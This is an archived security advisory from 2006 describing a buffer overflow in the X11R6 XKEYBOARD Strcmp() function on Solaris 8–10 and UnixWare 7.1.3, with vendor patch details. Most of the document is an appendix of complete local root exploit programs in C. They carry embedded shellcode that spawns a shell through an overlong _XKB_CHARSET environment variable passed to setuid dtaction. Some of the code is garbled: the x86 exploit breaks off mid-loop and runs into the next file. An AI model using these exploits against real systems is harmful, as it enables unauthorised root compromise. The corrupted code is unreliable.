AOH :: HP Unsorted X :: B06-4647.HTM

X11R6 XKEYBOARD extension Strcmp() buffer overflow



X11R6 XKEYBOARD extension Strcmp() buffer overflow
X11R6 XKEYBOARD extension Strcmp() buffer overflow



RISE-2006001=0D
X11R6 XKEYBOARD extension Strcmp() buffer overflow vulnerability=0D
=0D
Released: September 07, 2006=0D
Last updated: September 07, 2006=0D
=0D
INTRODUCTION=0D
=0D
There exists a vulnerability within a string manipulation function of the X11R6=0D
(X11R6.4 and lower) X Window System library, which when properly exploited can=0D
lead to local compromise of the vulnerable system.=0D
This vulnerability was silently fixed in X11R6.5.1 release, but it is still=0D
present in multiple vendors operating systems source tree.=0D
This vulnerability was confirmed by us in the following versions and operating=0D
systems, other versions and operating systems may be also affected.=0D
=0D
Sun Solaris 10 SPARC/x86=0D
Sun Solaris 9 SPARC/x86=0D
Sun Solaris 8 SPARC/x86=0D
SCO UnixWare 7.1.3=0D
=0D
DETAILS=0D
=0D
This vulnerability can be triggered by invoking a dynamicaly linked binary, with=0D
_XKB_CHARSET environment variable set to a long string value, and DISPLAY=0D
environment variable set to a X Window System server with the XKEYBOARD=0D
extension enabled.=0D
This is the vulnerable function (from X11R6.4).=0D
=0D
static int=0D
#if NeedFunctionPrototypes=0D
Strcmp(char *str1, char *str2)=0D
#else=0D
Strcmp(str1, str2)=0D
    char *str1, *str2;=0D
#endif=0D
{=0D
    char str[256];=0D
    char c, *s;=0D
=0D
    for (s = str; c = *str1++; ) {=0D
        if (isupper(c))=0D
            c = tolower(c);=0D
        *s++ = c;=0D
    }=0D
    *s = '\0';=0D
    return (strcmp(str, str2));=0D
}=0D
=0D
The proof of concept codes we have written for this vulnerability can be found=0D
in appendix section of this document.=0D
All source codes from this document can be also downloaded from our website.=0D
http://www.risesecurity.org/=0D 
=0D
VENDOR=0D
=0D
Sun has released patches for this vulnerability, the Sun Alert ID is 102570=0D
and it is available at the following URL:=0D
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102570-1=0D 
SCO did not answer to our email.=0D
=0D
CREDITS=0D
=0D
This vulnerability was discovered by Adriano Lima  and=0D 
Filipe Balestra .=0D 
=0D
DISCLAIMER=0D
=0D
The authors reserve the right not to be responsible for the topicality,=0D
correctness, completeness or quality of the information provided in this=0D
document. Liability claims regarding damage caused by the use of any information=0D
provided, including any kind of information which is incomplete or incorrect,=0D
will therefore be rejected.=0D
=0D
APPENDIX=0D
=0D
sol-sparc-xkb.c=0D
=0D
/*=0D
 *  X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC=0D
* Copyright 2006 RISE Security ,=0D 
* Ramon de Carvalho Valle =0D 
 *=0D
 *  This program is free software; you can redistribute it and/or modify=0D
 *  it under the terms of the GNU General Public License as published by=0D
 *  the Free Software Foundation; either version 2 of the License, or=0D
 *  (at your option) any later version.=0D
 *=0D
 *  This program is distributed in the hope that it will be useful,=0D
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of=0D
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the=0D
 *  GNU General Public License for more details.=0D
 *=0D
 *  You should have received a copy of the GNU General Public License=0D
 *  along with this program; if not, write to the Free Software=0D
 *  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA=0D
 *=0D
 */=0D
=0D
/*=0D
 *  Compile with the following command.=0D
 *  $ (g)cc -Wall -ldl -o sol-sparc-xkb sol-sparc-xkb.c=0D
 *=0D
 *  Set the DISPLAY environment variable to a X Window System server with=0D
 *  XKEYBOARD extension enabled.=0D
 *  $ ./sol-sparc-xkb sprintf|strcpy xserver:display=0D
 *=0D
 */=0D
=0D
#include =0D
#include =0D
#include =0D
#include =0D
#include =0D
#include =0D
#include =0D
#include =0D
=0D
#define BUFSIZE 13+256+64+2+1=0D
#define FRMSIZE 64+3+1=0D
#define ADRSIZE 2047+1=0D
#define SHLSIZE strlen(shellcode)+1=0D
#define DSPSIZE strlen(display)+1=0D
#define ARGSIZE 7+1=0D
#define ENVSIZE BUFSIZE+FRMSIZE+ADRSIZE+SHLSIZE+DSPSIZE=0D
#define PFMSIZE strlen(platform)+1=0D
#define PRGSIZE 20+1=0D
=0D
#define PAD(a,b,c) \=0D
    a+=((b+c)%2)?(((a%8)>4)?(16-(a%8)):(8-(a%8))):((a%8)?(12-(a%8)):4);=0D
=0D
char shellcode[]=           /*  60 bytes                          */=0D
    "\x90\x1a\x40\x09"      /*  xor     %o1,%o1,%o0               */=0D
    "\x82\x10\x20\x17"      /*  mov     0x17,%g1                  */=0D
    "\x91\xd0\x20\x08"      /*  ta      0x08                      */=0D
    "\x21\x0b\xd8\x9a"      /*  sethi   %hi(0x2f62696e),%l0       */=0D
    "\xa0\x14\x29\x6e"      /*  or      %l0,0x96e,%l0             */=0D
    "\x23\x0b\xdc\xda"      /*  sethi   %hi(0x2f736800),%l1       */=0D
    "\x90\x23\xa0\x08"      /*  sub     %sp,0x08,%o0              */=0D
    "\x92\x23\xa0\x10"      /*  sub     %sp,0x10,%o1              */=0D
    "\x94\x1a\x80\x0a"      /*  xor     %o2,%o2,%o2               */=0D
    "\xe0\x23\xbf\xf8"      /*  st      %l0,[%sp-0x08]            */=0D
    "\xe2\x23\xbf\xfc"      /*  st      %l1,[%sp-0x04]            */=0D
    "\xd0\x23\xbf\xf0"      /*  st      %o0,[%sp-0x10]            */=0D
    "\xc0\x23\xbf\xf4"      /*  st      %g0,[%sp-0x0c]            */=0D
    "\x82\x10\x20\x3b"      /*  mov     0x3b,%g1                  */=0D
    "\x91\xd0\x20\x08"      /*  ta      0x08                      */=0D
;=0D
=0D
void *find_symbol(const char *symbol){=0D
    void *handle,*addr;=0D
    char *err;=0D
=0D
    if((handle=dlmopen(LM_ID_LDSO,NULL,RTLD_LAZY))==NULL){=0D
        fprintf(stderr,"%s\n",dlerror());=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    dlerror();=0D
    addr=dlsym(handle,symbol);=0D
    if((err=dlerror())!=NULL){=0D
        fprintf(stderr,"%s\n",err);=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    dlclose(handle);=0D
=0D
    return addr;=0D
}=0D
=0D
void *find_rwxmem(void){=0D
    FILE *fp;=0D
    prmap_t map;=0D
    int flags;=0D
    void *addr;=0D
=0D
    if((fp=fopen("/proc/self/map","rb"))==NULL){=0D
        perror("fopen");=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    while(fread(&map,sizeof(map),1,fp)){=0D
        flags=map.pr_mflags;=0D
=0D
        if((flags&(MA_READ|MA_WRITE|MA_EXEC))==(MA_READ|MA_WRITE|MA_EXEC)){=0D
            if(flags&MA_STACK) continue;=0D
            addr=(void *)map.pr_vaddr;=0D
        }=0D
    }=0D
=0D
    fclose(fp);=0D
=0D
    return addr;=0D
}=0D
=0D
int main(int argc,char **argv){=0D
    char buf[8192],display[256],platform[256],addr[8][4],*envp[6],*p;=0D
    int base,offset,i,flag=0;=0D
=0D
    printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC\n");=0D
printf("Copyright 2006 RISE Security \n\n");=0D 
=0D
    if(argc!=3){=0D
        fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]);=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    if(!strcmp(argv[1],"sprintf")) flag=1;=0D
    if(!strcmp(argv[1],"strcpy")) flag=2;=0D
=0D
    if(!flag){=0D
        fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]);=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    snprintf(display,sizeof(display),"DISPLAY=%s",argv[2]);=0D
=0D
    if(sysinfo(SI_PLATFORM,platform,sizeof(platform))==-1){=0D
        perror("sysinfo");=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    base=((int)argv[0]|0xffff);=0D
    base++;=0D
=0D
    offset=ARGSIZE+ENVSIZE+PFMSIZE+PRGSIZE;=0D
    PAD(offset,1,sizeof(envp)-1);=0D
=0D
    *((int *)addr[0])=base-offset+ARGSIZE+BUFSIZE;=0D
    *((int *)addr[1])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE;=0D
    *((int *)addr[2])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE+ADRSIZE;=0D
=0D
    switch(flag){=0D
    case 1: *((int *)addr[3])=(int)find_symbol("sprintf")-4; break;=0D
    case 2: *((int *)addr[3])=(int)find_symbol("strcpy")-4;=0D
    }=0D
=0D
    *((int *)addr[4])=(int)find_rwxmem()+4;=0D
    *((int *)addr[5])=*((int *)addr[4])-8;=0D
=0D
    p=buf;=0D
    sprintf(p,"_XKB_CHARSET=");=0D
    p=buf+13;=0D
    for(i=0;i<256;i++) *p++='A';=0D
    for(i=0;i<66;i++) *p++=addr[1][i%4];=0D
    *p='\0';=0D
=0D
    memcpy(buf+13+256+56,addr[0],4);=0D
    memcpy(buf+13+256+60,addr[3],4);=0D
=0D
    p=buf+1024;;=0D
    for(i=0;i<(FRMSIZE-1);i++) *p++=addr[1][i%4];=0D
    *p='\0';=0D
=0D
    memcpy(buf+1024+32,addr[4],4);=0D
    memcpy(buf+1024+36,addr[2],4);=0D
    memcpy(buf+1024+60,addr[5],4);=0D
=0D
    p=buf+2048;=0D
    for(i=0;i<(ADRSIZE-1);i++) *p++=addr[1][i%4];=0D
    *p='\0';=0D
=0D
    envp[0]=&buf[0];=0D
    envp[1]=&buf[1024];=0D
    envp[2]=&buf[2048];=0D
    envp[3]=shellcode;=0D
    envp[4]=display;=0D
    envp[5]=NULL;=0D
=0D
    execle("/usr/dt/bin/dtaction","AAAAAAA",0,envp);=0D
=0D
    exit(EXIT_FAILURE);=0D
}=0D
=0D
sol-x86-xkb.c=0D
=0D
/*=0D
 *  X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86=0D
* Copyright 2006 RISE Security ,=0D 
* Ramon de Carvalho Valle =0D 
 *=0D
 *  This program is free software; you can redistribute it and/or modify=0D
 *  it under the terms of the GNU General Public License as published by=0D
 *  the Free Software Foundation; either version 2 of the License, or=0D
 *  (at your option) any later version.=0D
 *=0D
 *  This program is distributed in the hope that it will be useful,=0D
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of=0D
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the=0D
 *  GNU General Public License for more details.=0D
 *=0D
 *  You should have received a copy of the GNU General Public License=0D
 *  along with this program; if not, write to the Free Software=0D
 *  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA=0D
 *=0D
 */=0D
=0D
#include =0D
#include =0D
#include =0D
#include =0D
=0D
#define ADRSIZE 1024=0D
#define NOPSIZE 4096=0D
=0D
char shellcode[]=           /*  47 bytes                          */=0D
    "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */=0D
    "\x6a\x65"              /*  pushl   $0x65                     */=0D
    "\x89\xe6"              /*  movl    %esp,%esi                 */=0D
    "\xf7\x56\x04"          /*  notl    0x04(%esi)                */=0D
    "\xf6\x16"              /*  notb    (%esi)                    */=0D
    "\x31\xc0"              /*  xorl    %eax,%eax                 */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\xb0\x17"              /*  movb    $0x17,%al                 */=0D
    "\xff\xd6"              /*  call    *%esi                     */=0D
    "\x31\xc0"              /*  xorl    %eax,%eax                 */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\x68\x2f\x6b\x73\x68"  /*  pushl   $0x68736b2f               */=0D
    "\x68\x2f\x62\x69\x6e"  /*  pushl   $0x6e69622f               */=0D
    "\x89\xe3"              /*  movl    %esp,%ebx                 */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\x53"                  /*  pushl   %ebx                      */=0D
    "\x89\xe1"              /*  movl    %esp,%ecx                 */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\x51"                  /*  pushl   %ecx                      */=0D
    "\x53"                  /*  pushl   %ebx                      */=0D
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */=0D
    "\xff\xd6"              /*  call    *%esi                     */=0D
;=0D
=0D
int main(int argc,char **argv){=0D
    char buf[8192],display[256],addr[4],*envp[4],*p;=0D
    int i;=0D
=0D
    printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86\n");=0D
printf("Copyright 2006 RISE Security \n\n");=0D 
=0D
    if(argc!=2){=0D
        fprintf(stderr,"usage: %s xserver:display\n",argv[0]);=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]);=0D
=0D
    *((unsigned int *)addr)=(unsigned int)buf+256+1024+2048+1;=0D
=0D
    p=buf;=0D
    sprintf(p,"_XKB_CHARSET=");=0D
    p=buf+13;=0D
    for(i=0;i<256;i++) *p++='A';=0D
    for(i=0;i,=0D 
* Ramon de Carvalho Valle =0D 
 *=0D
 *  This program is free software; you can redistribute it and/or modify=0D
 *  it under the terms of the GNU General Public License as published by=0D
 *  the Free Software Foundation; either version 2 of the License, or=0D
 *  (at your option) any later version.=0D
 *=0D
 *  This program is distributed in the hope that it will be useful,=0D
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of=0D
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the=0D
 *  GNU General Public License for more details.=0D
 *=0D
 *  You should have received a copy of the GNU General Public License=0D
 *  along with this program; if not, write to the Free Software=0D
 *  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA=0D
 *=0D
 */=0D
=0D
#include =0D
#include =0D
#include =0D
#include =0D
=0D
#define ADRSIZE 1024=0D
#define NOPSIZE 4096=0D
=0D
char shellcode[]=           /*  43 bytes                          */=0D
    "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */=0D
    "\x6a\x65"              /*  pushl   $0x65                     */=0D
    "\x89\xe6"              /*  movl    %esp,%esi                 */=0D
    "\xf7\x56\x04"          /*  notl    0x04(%esi)                */=0D
    "\xf6\x16"              /*  notb    (%esi)                    */=0D
    "\x31\xc0"              /*  xorl    %eax,%eax                 */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\xb0\x17"              /*  movb    $0x17,%al                 */=0D
    "\xff\xd6"              /*  call    *%esi                     */=0D
    "\x31\xc0"              /*  xorl    %eax,%eax                 */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\x68\x2f\x2f\x73\x68"  /*  pushl   $0x68732f2f               */=0D
    "\x68\x2f\x62\x69\x6e"  /*  pushl   $0x6e69622f               */=0D
    "\x89\xe3"              /*  movl    %esp,%ebx                 */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\x53"                  /*  pushl   %ebx                      */=0D
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */=0D
    "\xff\xd6"              /*  call    *%esi                     */=0D
;=0D
=0D
int main(int argc,char **argv){=0D
    char buf[8192],display[256],addr[4],*envp[4],*p;=0D
    int i;=0D
=0D
    printf("X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3 x86\n");=0D
printf("Copyright 2006 RISE Security \n\n");=0D 
=0D
    if(argc!=2){=0D
        fprintf(stderr,"usage: %s xserver:display\n",argv[0]);=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]);=0D
=0D
    *((unsigned int *)addr)=(unsigned int)buf+2048+256+1024+2048+1;=0D
=0D
    p=buf;=0D
    sprintf(p,"_XKB_CHARSET=");=0D
    p=buf+13;=0D
    for(i=0;i<256;i++) *p++='A';=0D
    for(i=0;ihttp://www.risesecurity.org/=0D 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.